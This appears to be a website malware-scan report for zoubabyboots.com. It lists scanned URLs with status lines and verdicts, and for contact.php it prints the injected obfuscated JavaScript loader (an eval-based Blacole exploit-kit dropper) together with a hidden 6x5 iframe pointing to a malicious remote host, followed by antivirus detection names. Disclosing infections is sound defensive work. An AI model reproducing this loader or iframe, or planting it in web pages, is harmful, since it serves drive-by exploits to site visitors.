... 3574 bytes are skipped ...59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:69:5e:5d:65:27:30:1f:20:32:4:1:74:4:1:74"[jitw](":");}fwa=mmlcu;wnahvx=[];for(zqv=22-20-2;-zqv+1438!=0;zqv+=1){vfycvt=zqv;if((0x19==031))wnahvx+=String.fromCharCode(eval(wuhksn+fwa[1*vfycvt])+0xa-mbroe);}hjvjj=eval;hjvjj(wnahvx)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clodfeb.Trojan.a31e
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Exploit.JS.Pdfka.gki
- ViRobot
- JS.A.EX-Pdfka.4574.A
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://zoubabyboots.com/test404page.js | 404 Not Found Content-Length: 2445 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1688 Content-Type: application/x-javascript | clean |
http://zoubabyboots.com/contact.php | 200 OK Content-Length: 16222 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jitw="s"+"p"+"li"+"t";fwa=window;cug="dy";ampux=document;wuhksn="0x";mbroe=(5-3-1);try{++(ampux.body)}catch(hob){bqzp=false;try{}catch(mqj){bqzp=21;}if(1){mmlcu="17:5d:6c:65:5a:6b:60:66:65:17:6a:69:5e:5d:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:69:5e:5d:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b ...[4116 bytes skipped]... Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.JS.Blacole.Z
- Bkav
- MW.Clodfeb.Trojan.a31e
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1127
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Exploit.JS.Pdfka.gki
- ViRobot
- JS.A.EX-Pdfka.4574.A
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.JS.Blacole.Z
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- Script/Exploit.Kit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.JS.Blacole.Z
Malicious iFrame found. The same iFrame was found in 21 websites. size: 6x5 src: http://elite-bijou.com.ua/wp-includes/13x.phpThis URL is marked by Google as suspicious <iframe src="http://elite-bijou.com.ua/wp-includes/13x.php" border="0" width="6" height="5" /> |